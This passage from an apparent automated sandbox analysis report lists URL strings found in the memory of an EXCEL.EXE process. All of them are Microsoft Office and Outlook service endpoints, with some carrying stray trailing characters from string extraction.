      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comL
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.coma
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comf
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.compDy
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comt
      Source: EXCEL.EXE, 00000000.00000002.933748369.0000000013149000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outl
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000002.933931227.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782557094.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807864897.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662707230.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787086454.0000000013235000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743519317.0000000013235000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933748369.0000000013149000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://dev0-api.acompli.net/autodetecti
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.com9
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://directory.services.
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://ecs.office.com/config/v2/OfficeX
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/)
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/?
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtmld
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://entitlement.diagnostics.office.coma
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechi
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android(
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/2
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://graph.windows.net
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://graph.windows.net/
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/:
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/T
      Source: EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comG
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comg
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: EXCEL.EXE, 00000000.00000002.933587531.0000000013059000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry8
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?OU6
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EXCEL.EXE, 00000000.00000002.933545976.0000000013026000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
